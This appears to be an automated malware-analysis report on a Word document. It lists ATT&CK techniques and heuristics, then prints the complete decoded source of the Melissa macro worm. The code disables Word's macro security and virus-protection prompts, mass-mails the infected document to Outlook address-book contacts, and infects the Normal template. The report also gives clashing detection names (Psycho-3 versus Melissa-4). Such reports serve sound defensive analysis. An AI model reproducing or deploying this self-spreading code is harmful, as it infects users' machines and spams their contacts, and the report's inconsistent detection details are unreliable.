Verdict: MALICIOUS
Risk Score: 208

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
The sample is a Microsoft Word document containing a VBA macro named 'Melissa' that executes upon opening. This macro attempts to disable security warnings and then uses Outlook to send copies of itself to contacts in the user's address book. The ClamAV detection of 'Win.Trojan.Melissa-4' strongly suggests this is a variant of the Melissa virus, known for its email propagation capabilities.
Heuristics (5)

- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script (truncated by the analyzer):
  `Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CU …`
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: the same truncated excerpt as for the CreateObject finding above.
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x40 bytes

Disassembly (attempted x86 opcode disassembly of the flagged byte run; the single byte 0x40 decodes as `inc eax` at every address from 0000592D through 0000598C, 96 instructions in total):

```
0000592D 40 inc eax
0000592E 40 inc eax
0000592F 40 inc eax
00005930 40 inc eax
...
0000598B 40 inc eax
0000598C 40 inc eax
```

This heuristic matches raw byte runs inside the file; the verdict summarised above rests on the VBA macro and the ClamAV signature, not on this sled.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3743 bytes |

SHA-256: 1cdfa4537e4bb35726cb0d0660c1b5e7fb4d08aec222549ea3334a925ce96e81

Detection: ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.codemodule.CountOfLines
ADCL = ADI1.codemodule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.codemodule.deletelines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.codemodule.deletelines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.codemodule.Lines(1, 1) = ""
ADI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, ADI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.codemodule.Lines(1, 1) = ""
NTI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, NTI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
```